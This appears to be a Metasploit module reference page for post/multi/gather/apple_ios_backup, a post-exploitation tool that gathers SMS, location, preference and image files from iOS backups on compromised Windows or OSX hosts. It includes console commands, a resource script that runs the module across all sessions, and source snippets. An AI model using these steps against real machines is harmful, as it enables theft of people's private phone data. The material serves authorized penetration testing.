Windows Gather Apple iOS MobileSync Backup File Collection - Metasploit
This page contains detailed information about how to use the post/multi/gather/apple_ios_backup Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Gather Apple iOS MobileSync Backup File Collection
Module: post/multi/gather/apple_ios_backup
Source code: modules/post/multi/gather/apple_ios_backup.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): OSX, Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will collect sensitive files from any on-disk iOS device backups
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/multi/gather/apple_ios_backup
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/multi/gather/apple_ios_backup
msf post(apple_ios_backup) > show options
... show and set options ...
msf post(apple_ios_backup) > set SESSION session-id
msf post(apple_ios_backup) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
<ruby>
# Ruby inside a resource file must sit between <ruby> and </ruby> tags;
# lines outside the tags are treated as plain console commands.
framework.sessions.each_pair do |sid, session|
  run_single("use post/multi/gather/apple_ios_backup")
  run_single("set SESSION #{sid}")
  run_single("run")
end
</ruby>
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
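The resource script above runs the module against every session, including ones the module rejects with the "Only meterpreter sessions are supported on windows hosts" and "Unsupported platform" errors listed under Error Messages. The following is an added example, not code from the module or its documentation, that filters sessions first and sets the module's options explicitly; it assumes session.platform returns 'windows' or 'osx' for the supported hosts and that print_status is available alongside run_single in the resource-script context, and in a resource file the Ruby goes between <ruby> and </ruby> tags.

```ruby
# Added example (not part of the module). Platform strings 'windows' and
# 'osx' are assumed to be what session.platform returns for supported hosts.
SUPPORTED_PLATFORMS = %w[windows osx].freeze

# True when the module can run against this session: the platform must be
# OSX or Windows, and on Windows only Meterpreter sessions are accepted
# (a shell session there triggers the module's first error message).
def eligible_session?(platform, type)
  platform = platform.to_s.downcase
  type = type.to_s.downcase
  return false unless SUPPORTED_PLATFORMS.include?(platform)
  return false if platform == 'windows' && type != 'meterpreter'
  true
end

# Console commands for one session, with the module's four collection
# options set explicitly instead of relying on their defaults.
def commands_for(sid, databases: true, plists: true, images: false, everything: false)
  [
    'use post/multi/gather/apple_ios_backup',
    "set SESSION #{sid}",
    "set DATABASES #{databases}",
    "set PLISTS #{plists}",
    "set IMAGES #{images}",
    "set EVERYTHING #{everything}",
    'run'
  ]
end

# Inside msfconsole the framework object exists; run stand-alone, the
# script only defines the helpers above.
if defined?(framework)
  framework.sessions.each_pair do |sid, session|
    unless eligible_session?(session.platform, session.type)
      print_status("Skipping session #{sid}: #{session.platform}/#{session.type} is not supported by this module")
      next
    end
    commands_for(sid).each { |cmd| run_single(cmd) }
  end
end
```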
Required Options
- SESSION: The session to run this module on.
Msfconsole Usage
Here is how the multi/gather/apple_ios_backup post exploitation module looks in the msfconsole:
msf6 > use post/multi/gather/apple_ios_backup
msf6 post(multi/gather/apple_ios_backup) > show info
Name: Windows Gather Apple iOS MobileSync Backup File Collection
Module: post/multi/gather/apple_ios_backup
Platform: OSX, Windows
Arch:
Rank: Normal
Provided by:
hdm
bannedit
Compatible session types:
Meterpreter
Shell
Basic options:
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
DATABASES   true             no        Collect all database files? (SMS, Location, etc)
EVERYTHING  false            no        Collect all stored files? (SLOW)
IMAGES      false            no        Collect all image files?
PLISTS      true             no        Collect all preference list files?
SESSION                      yes       The session to run this module on.
Description:
This module will collect sensitive files from any on-disk iOS device
backups
Module Options
This is a complete list of options available in the multi/gather/apple_ios_backup post exploitation module:
msf6 post(multi/gather/apple_ios_backup) > show options
Module options (post/multi/gather/apple_ios_backup):
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
DATABASES   true             no        Collect all database files? (SMS, Location, etc)
EVERYTHING  false            no        Collect all stored files? (SLOW)
IMAGES      false            no        Collect all image files?
PLISTS      true             no        Collect all preference list files?
SESSION                      yes       The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the multi/gather/apple_ios_backup post exploitation module:
msf6 post(multi/gather/apple_ios_backup) > show advanced
Module advanced options (post/multi/gather/apple_ios_backup):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
VERBOSE    false            no        Enable detailed status messages
WORKSPACE                   no        Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the multi/gather/apple_ios_backup module can do:
msf6 post(multi/gather/apple_ios_backup) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the multi/gather/apple_ios_backup post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(multi/gather/apple_ios_backup) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
- Only meterpreter sessions are supported on windows hosts
- Unsupported platform <SESSION.PLATFORM>
- No users found with an iTunes backup directory
- Only checking <WHOAMI> account since we do not have SYSTEM...
- Manifest.mbdb not found in <PATH>...
- Manifest.mbdx not found in <PATH>...
- Failed to download <FNAME>: <E.CLASS> <E>
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Only meterpreter sessions are supported on windows hosts
Here is a relevant code snippet related to the "Only meterpreter sessions are supported on windows hosts" error message:
      @appdata = '\\Application Data'
      @users = drive + '\\Documents and Settings'
    end

    if session.type != "meterpreter"
      print_error "Only meterpreter sessions are supported on windows hosts"
      return
    end
    paths = enum_users_windows
  else
    print_error "Unsupported platform #{session.platform}"
Unsupported platform <SESSION.PLATFORM>
Here is a relevant code snippet related to the "Unsupported platform <SESSION.PLATFORM>" error message:
      print_error "Only meterpreter sessions are supported on windows hosts"
      return
    end
    paths = enum_users_windows
  else
    print_error "Unsupported platform #{session.platform}"
    return
  end

  if paths.empty?
    print_status("No users found with an iTunes backup directory")
No users found with an iTunes backup directory
Here is a relevant code snippet related to the "No users found with an iTunes backup directory" error message:
    print_error "Unsupported platform #{session.platform}"
    return
  end

  if paths.empty?
    print_status("No users found with an iTunes backup directory")
    return
  end

  process_backups(paths)
end
Only checking <WHOAMI> account since we do not have SYSTEM...
Here is a relevant code snippet related to the "Only checking <WHOAMI> account since we do not have SYSTEM..." error message:
      end
    rescue ::Rex::Post::Meterpreter::RequestError
      # Handle the case of the @users base directory is not accessible
    end
  else
    print_status "Only checking #{whoami} account since we do not have SYSTEM..."
    path = "#{@users}\\#{whoami}#{@appdata}\\Apple Computer\\MobileSync\\Backup"
    dirs = check_for_backups_win(path)
    dirs.each { |dir| paths << dir } if dirs
  end
  return paths
Manifest.mbdb not found in <PATH>...
Here is a relevant code snippet related to the "Manifest.mbdb not found in <PATH>..." error message:

  print_status("Reading Manifest.mbdb from #{path}...")
  if session.type == "shell"
    mbdb_data = session.shell_command("cat #{path}/Manifest.mbdb")
    if mbdb_data =~ /No such file/i
      print_status("Manifest.mbdb not found in #{path}...")
      return
    end
  else
    mfd = session.fs.file.new("#{path}\\Manifest.mbdb", "rb")
    until mfd.eof?
Manifest.mbdx not found in <PATH>...
Here is a relevant code snippet related to the "Manifest.mbdx not found in <PATH>..." error message:

  print_status("Reading Manifest.mbdx from #{path}...")
  if session.type == "shell"
    mbdx_data = session.shell_command("cat #{path}/Manifest.mbdx")
    if mbdx_data =~ /No such file/i
      print_status("Manifest.mbdx not found in #{path}...")
      return
    end
  else
    mfd = session.fs.file.new("#{path}\\Manifest.mbdx", "rb")
    until mfd.eof?
Failed to download <FNAME>: <E.CLASS> <E>
Here is a relevant code snippet related to the "Failed to download <FNAME>: <E.CLASS> <E>" error message:

      store_loot("ios.backup.data", ctype, session, fdata, rname, "iOS Backup: #{rname}")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Failed to download #{fname}: #{e.class} #{e}")
    end

    done[fname] = true
  end
end
Related Pull Requests
- #14696 Merged Pull Request: Zeitwerk rex folder
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7507 Merged Pull Request: Refactor arch/platform, refactor TLV XOR, add UUID to each packet, fix payload uuid/arch/platform tracking, and update everything to match
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #2782 Merged Pull Request: Stop abusing expand path
- #2525 Merged Pull Request: Change module boilerplate
- #2417 Merged Pull Request: Prefer Ruby style for single word collections
- #2304 Merged Pull Request: Fix load order in posts, hopefully forever
- #1241 Merged Pull Request: Removed all $Id$ and $Revision$ occurences
- #958 Merged Pull Request: Msftidy 2
- #208 Merged Pull Request: Fixed gather/apple_ios_backup to work with OSX
See Also
Check also the following modules related to this module:
- auxiliary/dos/apple_ios/webkit_backdrop_filter_blur
- exploit/apple_ios/browser/safari_jit
- exploit/apple_ios/browser/safari_libtiff
- exploit/apple_ios/browser/webkit_createthis
- exploit/apple_ios/browser/webkit_trident
- exploit/apple_ios/email/mobilemail_libtiff
- exploit/apple_ios/ssh/cydia_default_ssh
- payload/apple_ios/aarch64/meterpreter_reverse_http
- payload/apple_ios/aarch64/meterpreter_reverse_https
- payload/apple_ios/aarch64/meterpreter_reverse_tcp
- payload/apple_ios/aarch64/shell_reverse_tcp
- payload/apple_ios/armle/meterpreter_reverse_http
- payload/apple_ios/armle/meterpreter_reverse_https
- payload/apple_ios/armle/meterpreter_reverse_tcp
- post/apple_ios/gather/ios_image_gather
- post/apple_ios/gather/ios_text_gather
- post/multi/gather/aws_ec2_instance_metadata
- post/multi/gather/aws_keys
- post/multi/gather/check_malware
- post/multi/gather/chrome_cookies
- post/multi/gather/dbvis_enum
- post/multi/gather/dns_bruteforce
- post/multi/gather/dns_reverse_lookup
- post/multi/gather/dns_srv_lookup
- post/multi/gather/docker_creds
- post/multi/gather/enum_hexchat
- post/multi/gather/enum_software_versions
- post/multi/gather/enum_vbox
- post/multi/gather/env
- post/multi/gather/fetchmailrc_creds
- post/multi/gather/filezilla_client_cred
- post/multi/gather/find_vmx
- post/multi/gather/firefox_creds
- post/multi/gather/gpg_creds
- post/multi/gather/grub_creds
- post/multi/gather/irssi_creds
- post/multi/gather/jboss_gather
- post/multi/gather/jenkins_gather
- post/multi/gather/lastpass_creds
- post/multi/gather/maven_creds
- post/multi/gather/multi_command
- post/multi/gather/netrc_creds
- post/multi/gather/pgpass_creds
- post/multi/gather/pidgin_cred
- post/multi/gather/ping_sweep
- post/multi/gather/remmina_creds
- post/multi/gather/resolve_hosts
- post/multi/gather/rsyncd_creds
- post/multi/gather/rubygems_api_key
- post/multi/gather/run_console_rc_file
- post/multi/gather/saltstack_salt
- post/multi/gather/skype_enum
- post/multi/gather/ssh_creds
- post/multi/gather/thunderbird_creds
- post/multi/gather/tomcat_gather
- post/multi/gather/ubiquiti_unifi_backup
- post/multi/gather/unix_cached_ad_hashes
- post/multi/gather/unix_kerberos_tickets
- post/multi/gather/wlan_geolocate
Authors
- hdm
- bannedit
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.